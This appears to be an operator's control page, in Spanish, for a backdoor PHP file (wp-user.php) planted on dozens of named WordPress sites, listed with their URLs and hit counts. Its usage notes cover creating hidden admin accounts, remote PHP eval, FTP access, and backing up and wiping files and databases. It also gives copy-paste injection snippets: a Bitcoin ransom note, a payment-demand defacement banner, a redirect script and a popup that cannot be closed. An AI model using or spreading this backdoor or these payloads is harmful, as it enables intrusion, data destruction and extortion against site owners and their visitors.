← Back to tools

Puedes usar PHPINFO, ?ftp, login=backdoor o login=cualquier username, redirect URL, backup/erase de BDD o Archivos y Eval codigo.
*Aguas con usar 0_NOMBRE UNICO AQUI!!! que puedes borrar accidentalmente a otro

Quien Cada script debe ser unico	Creación	Ult. modificación	Donde Donde fue visto ultima vez	Clics Total veces ejecutado	Clics/dia (/4 ?)	Regresa PHP hara eval( de lo que pongas ); evita html, solo php (solo nuevos lo traen)
0_NOMBRE UNICO AQUI!!!	06/03/2026 Hace 77 días	2026-05-23 03:41:14 Hace 0 días	https://preview2.alexcd2000.com/wp-user.php	381 clics / 78 dias	1
Advizee	07/11/2025 Hace 197 días	2026-05-04 16:00:36 Hace 19 días	http://advizee.ca/wp-user.php	23 clics / 179 dias	0
Advizee Aims Fittings	22/10/2025 Hace 213 días	2026-05-23 06:20:59 Hace 0 días	https://1.aimsfittings.com/all-products/check-valves-plastic/%26quot%3Bhttps%3A/1.aimsfittings.com/request-a-quote/%26quot;>687	41816 clics / 214 dias	49	1
Advizee Centroplast	08/12/2025 Hace 166 días	2026-05-08 17:23:38 Hace 15 días	http://centroplast.ca/wp-user.php	21 clics / 152 dias	0
Advizee Dono	25/11/2025 Hace 179 días	2026-05-08 17:23:38 Hace 15 días	http://donoelectronic.com/wp-user.php	12 clics / 165 dias	0
Advizee Laurentian	30/05/2025 Hace 358 días	2026-04-16 03:17:34 Hace 37 días	http://laurentiandachshunds.com/wp-user.php	14 clics / 322 dias	0	1
Advizee Localbeauty	02/05/2025 Hace 385 días	2026-05-08 17:23:38 Hace 15 días	http://localbeautyartist.com/wp-user.php	167715 clics / 372 dias	113	1
Advizee new Urgence Physio	16/10/2025 Hace 219 días	2026-05-04 16:02:09 Hace 19 días	http://urgencephysio.com/wp-user.php	12 clics / 201 dias	0	1
Advizee Physio Sacre	10/06/2025 Hace 347 días	2026-05-08 17:23:38 Hace 15 días	http://physiosacrecoeur.com/wp-user.php	16 clics / 333 dias	0	1
Alexcd2000 Mesa de Regalos	15/07/2025 Hace 311 días	2026-05-04 09:36:42 Hace 19 días	http://mesa-de-regalos.com/wp-user.php	90 clics / 293 dias	0	1
Alexcd2000 MyQRMenu	21/05/2025 Hace 366 días	2026-04-03 09:21:07 Hace 50 días	https://myqr.menu/wp-user.php	144 clics / 317 dias	0	1
Alexcd2000 S y A Boda	09/09/2025 Hace 255 días	2026-05-15 07:09:03 Hace 8 días	https://samantha-alejandro.com/wp-user.php	116 clics / 248 dias	0	1
Ali Wheelzone AU	22/07/2025 Hace 305 días	2025-10-22 00:42:12 Hace 213 días	https://wheelzone.co.nz/wp-user.php?que=phpinfo	2 clics / 93 dias	0	1
Ariel Fasticeusa	16/07/2025 Hace 310 días	2026-01-09 12:51:27 Hace 134 días	https://www.fasticeusa.com/wp-user.php?que=phpinfo	5 clics / 178 dias	0	1
Chandler Mx	16/12/2025 Hace 158 días	2026-04-04 15:29:33 Hace 49 días	https://crossdocksandstorage.com/wp-user.php	77 clics / 111 dias	0
Diego Aim Fully Books	05/09/2025 Hace 260 días	2025-10-22 00:42:12 Hace 213 días	https://www.aimfullybooks.com/wp-user.php?que=ftp	2 clics / 47 dias	0	1
Dreilaut Red Rabane	08/05/2025 Hace 379 días	2025-12-07 20:00:09 Hace 166 días	https://red-rebane.de/wp-user.php	11 clics / 214 dias	0	1
Dreilaut Schweriner	06/05/2025 Hace 381 días	2025-10-22 00:42:12 Hace 213 días	https://schweriner-hoefe.de/wp-user.php	2 clics / 169 dias	0	1
Ecosa Aaron	02/05/2025 Hace 385 días	2026-05-08 17:23:38 Hace 15 días	https://www.catalogo.ecosa.com.mx/wp-user.php	6 clics / 372 dias	0	1
Gary Hydracheck	14/08/2025 Hace 282 días	2026-05-12 09:29:28 Hace 11 días	https://www.hydracheck.com/wp-user.php	16 clics / 272 dias	0	1
Hugo Spirithill	12/01/2026 Hace 131 días	2026-01-15 08:54:14 Hace 128 días	https://spirithillswinery.com/alexcd2000-user.php	3 clics / 4 dias	0
Javier Roberto GymProManager	29/05/2025 Hace 358 días	2026-01-09 18:06:12 Hace 134 días	https://gympromanager.com/wp-user.php	6 clics / 226 dias	0	1
Joey Curveblock Root WP	05/03/2026 Hace 79 días	2026-03-05 16:26:30 Hace 79 días	https://curveblock.io/wp-user.php	1 clics / 1 dias	0
Joey New Curveblock	23/01/2026 Hace 120 días	2026-05-08 17:23:43 Hace 15 días	https://rwaventuresltd.com/wp-user.php?action=zip&dir=disable-updates&p=	8 clics / 107 dias	0
Jorge Col AcompanantesCol	03/03/2026 Hace 80 días	2026-03-03 19:44:46 Hace 80 días	https://acompanantescolombia.com/wp-user.php	1 clics / 1 dias	0
Jorge Col Admin Escorts	06/03/2026 Hace 78 días	2026-03-06 01:33:20 Hace 78 días	http://admin-escorts.n1rqimbpba-jr3oy5wwr61m.p.temp-site.link/user.php	2 clics / 1 dias	1
Jorge Col AdondeViajar	03/03/2026 Hace 80 días	2026-04-30 03:33:47 Hace 23 días	https://adondeviajar.net/wp-user.php	60 clics / 58 dias	0
Jorge Col CEV	03/03/2026 Hace 80 días	2026-04-29 23:41:15 Hace 23 días	https://colombiaeroticvacations.com/wp-user.php	26 clics / 58 dias	0
Jorge Col MasNuruCol	03/03/2026 Hace 80 días	2026-04-02 17:27:57 Hace 51 días	https://masajesnurucolombia.com/wp-user.php	3 clics / 31 dias	0
Jorge Col MicroBlade	03/03/2026 Hace 80 días	2026-05-22 04:52:10 Hace 1 días	https://microbladingeyebrowsandlashextensions.ca/wp-user.php	18 clics / 80 dias	0
Luis Axo Rusa Ingenieros	05/12/2025 Hace 169 días	2026-05-14 03:57:06 Hace 9 días	https://rusaingenieros.es/wp-user.php	101 clics / 161 dias	0
Michael Mx Fullonproauto	18/12/2025 Hace 155 días	2026-05-08 17:23:37 Hace 15 días	https://fullonproauto.com/wp-user.php	63 clics / 142 dias	0
Radar Politico Mauricio Colombia	16/10/2025 Hace 219 días	2025-10-22 00:42:12 Hace 213 días	https://radarpolitico.online/helper.php?que=ftp	3 clics / 6 dias	0	1
Reynaldo Mueblify	28/08/2025 Hace 268 días	2025-10-22 00:42:12 Hace 213 días	https://preview2.alexcd2000.com/wp-user.php	1 clics / 56 dias	0	1
Ross AgriX	06/05/2025 Hace 382 días	2025-10-22 00:42:12 Hace 213 días	https://agri-x.global/wp-user.php?que=phpinfo	1 clics / 169 dias	0	1
Ross AgriX Limpio	07/05/2025 Hace 381 días	2025-10-22 00:42:12 Hace 213 días	http://cap-x.global/wp-user.php	50 clics / 169 dias	0	1
St Philomena Nuns	16/06/2025 Hace 340 días	2026-05-22 08:33:04 Hace 1 días	https://saintphilomenaconvent.org/wp-user.php	43 clics / 340 dias	0	1
St Philomenaa School Nuns	19/06/2025 Hace 337 días	2026-05-16 06:54:59 Hace 7 días	http://ihmsnh.org/wp-user.php	87 clics / 331 dias	0	1
Sven IKFF	03/07/2025 Hace 324 días	2025-10-22 00:42:12 Hace 213 días	https://temp.ikff.no/wp-user.php?sven%20ryen	2 clics / 111 dias	0	1
Thorsten Health Care	29/01/2026 Hace 114 días	2026-02-10 17:26:13 Hace 102 días	https://meta-health.pro/wp-user.php	641 clics / 13 dias	12
Tomas Kiz10	19/08/2025 Hace 277 días	2025-10-22 00:42:12 Hace 213 días	https://kiz10.com/peso.php	4 clics / 65 dias	0	1
Viv NerdleWordle	20/01/2026 Hace 123 días	2026-05-23 06:29:25 Hace 0 días	https://nerdlewordle.com/	99370 clics / 124 dias	200
Yonduur Deanna	21/07/2025 Hace 305 días	2025-10-29 02:46:07 Hace 206 días	https://yonduur.com/wp-user.php?que=phpinfo	5 clics / 100 dias	0	1

Comandos (a partir de Aug 2025):

- Ya tienes un ftp con wp-user.php?ftp, que mas quieres?
- wp-user.php?debug para tener un debugeador del log de errores de wp, que también filtra... así que con eso es una super herramienta

Comandos (a partir de Apr 2024, adicional y pruebas):

- Ya hace backups de la base de datos y permite borrala. Hay que hacer esto antes de borrar los archivos obvio
- Puedes usar phpinfo para ver la config del server
- Si necesitas borrar al usuario backdoor, recuerda con wp data access directo puedes borrar el usuario en la tabla wp_user y listo... no haria falta borrar la meta del user seria mucho...

Comandos (a partir de Jul 2022, adicional y pruebas):

- En wp-user faltaba eval($ pieces[1]); en el ultimo else, el cual ahora se ejecuta para correr php remotamente.
- Hice pruebas con eval y yi hay una falla truena todo eval() y no hace nada y muestra el warning si es que ya estaba activado.
- Descubri que puedes hacer error on y off siempre y cuando el código que mandes para eval() no tenga fallas.
- Truena todo el código que lleva " o ' en un string (por ejemplo un query o un echo script) que sea ya que no permite escaparlo (supongo lo escapa una vez en la bdd, otra en el json y otra hasta el php que se ejecuta... pues ya no llega y no hay triple escapacion...). Asi que trata de evitarlo si es un query solo inserta numeros (como para un login) o un script lo adaptas.

Comandos (a partir de Nov 2021, adicional):

- El archivo ahora esta en raiz /wp-user.php y tiene la función que: /wp-user.php?login=backdoor

que crea un admin de WP con ese username y pwd (backdoor). Tiene las demás funciones que antes cuando lo pegabas en blog-header solo que ahora agregas
una función con un include() en functions.php para que se ejecute siempre y no se pierda al actualizar (a menos cambien de tema).
Corre solo en el front end, porque en el back causa algunos plugins que se comporten raro. El PHP evaluate no esta funcionando...
pero no te hace falta si borras, backup, echo html o redirecciones y aparte creas usuarios admin de wp.
Aparte eso tronaba los sitios porque es un echo dentro del head

Comandos (a partir de Dic 2020, tambien ejecuta PHP):

- BorraTodo : borra todos los archivos en la carpeta donde esta el codigo
- RespaldoTodo : crea un zip para que decargues antes de borrar. Puede tardar un poco pero al terminar la pagina listo

Copy paste:

Div nota:
<div style='position: fixed;z-index:9999;top: 10px;'><h1><br><br><a style='color:red;background-color:yellow;' href = 'https://www.paypal.me/alexcd2000'>Hey Site-Admin! Don't be a rascal! Pay your debts click here</a><br><br></h1></div>

Pago Bitso:
<div style='text-align:center; position: fixed;z-index:9999;top: 10px;'><h1><br><br>Send 100 USD to this Bitcoin Wallet to recover your site:<br><br>35M4issvwj8LiM4bErn4FUniuz16fnbRBK<br> <img src='http://comercializadoraallotnetenforcer.com/bitcoinwallet.jpg'><br><br></h1></div>

Reenvio :
<script>window.location.replace("url");</script>

o popup invasivo no se cierra:
<style> /*Pop up*/ .overlaypop { position: fixed; top: 0; bottom: 0; left: 0; right: 0; background: rgba(0, 0, 0, 0.6);/* fondo translucido */ transition: opacity 2s;/*cuanto tarda en colorearse */ visibility: visible; opacity: 1; z-index:998;/* uno menos que el popup*/ } .popupfondo { margin: 10vh auto; padding: 20px; background: white;/* color fondo*/ border-radius: 20px;/*bordes redondos */ width: 30vw; position: relative; transition: all 4s ease-in-out; z-index:999;/* aun así pon siempre al ultimo este div del html*/ } .popupfondo h1 { margin-top: 0; text-align: center; color: red;/*titulo popupfondo */ } @media screen and (max-width: 700px){/*es mas ancho en moviles*/ .popupfondo{ width: 80vw; } .popupfondo .content { max-height: 60vh; } } </style> <div id="pop" class="overlaypop"> <div class="popupfondo"> <a href="https://www.paypal.me/alexcd2000/2000mxn"><h1>Hey site admin, pay your debts! don't be a rascal. Click here</h1></a> </div> </div>

Puedes usar PHPINFO, ?ftp, login=backdoor o login=cualquier username, redirect URL, backup/erase de BDD o Archivos y Eval codigo. *Aguas con usar 0_NOMBRE UNICO AQUI!!! que puedes borrar accidentalmente a otro

Puedes usar PHPINFO, ?ftp, login=backdoor o login=cualquier username, redirect URL, backup/erase de BDD o Archivos y Eval codigo.
*Aguas con usar 0_NOMBRE UNICO AQUI!!! que puedes borrar accidentalmente a otro